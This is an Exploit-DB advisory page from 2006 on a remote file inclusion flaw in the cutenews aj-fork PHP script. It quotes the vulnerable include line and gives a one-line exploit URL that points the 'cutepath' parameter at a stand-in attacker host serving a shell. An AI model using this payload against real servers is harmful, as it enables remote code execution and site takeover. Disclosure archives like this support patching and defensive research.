cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability



EDB-ID: 2891 CVE: 2006-6546OSVDB-ID: 32339
Author: DeltahackingTEAMPublished: 2006-12-04Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
===========================================================================================================
DeltasecurityTEAM
www.Deltasecurity.ir
===========================================================================================================
* Portal Name : cutenews aj-fork
* Class = Remote File Inclusion ;
* Download =http://mesh.dl.sourceforge.net/sourceforge/ajfork/cn_aj_167.zip
* Found by = DeltahackingTEAM
* User In Delta Team (Tanha )
----------------------------------------------------------------------------------------------------------
- Vulnerable Code
--------------------
    include($cutepath.'/inc/plugins.php');
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
    http://[target]/[Path]/inc/shows.inc.php?cutepath=http://evilsite.com/shell?
----------------------------------------------------------------------------------------------------------
Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN
Sp Tnx For Dr.Pantagon For Learning Find Bug
# milw0rm.com [2006-12-04]






Comments

No comments so far